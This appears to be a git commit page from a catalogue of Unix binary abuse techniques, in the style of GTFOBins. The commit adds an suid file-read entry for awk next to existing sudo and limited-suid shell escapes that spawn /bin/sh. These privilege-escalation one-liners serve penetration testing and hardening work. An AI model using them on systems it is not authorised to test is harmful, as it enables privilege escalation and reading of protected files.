add suid to awk

master
Mr. Robot 3 years ago committed by GitHub
parent 8f0bea4a12
commit 6b5d641745
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -32,10 +32,15 @@
"code": "sudo awk 'BEGIN {system(\"/bin/sh\")}'" "code": "sudo awk 'BEGIN {system(\"/bin/sh\")}'"
} }
], ],
"suid": [
{
"code": "./awk '//' \"[file]\""
}
],
"limited-suid": [ "limited-suid": [
{ {
"code": "./awk 'BEGIN {system(\"/bin/sh\")}'" "code": "./awk 'BEGIN {system(\"/bin/sh\")}'"
} }
] ]
} }
} }

Loading…
Cancel
Save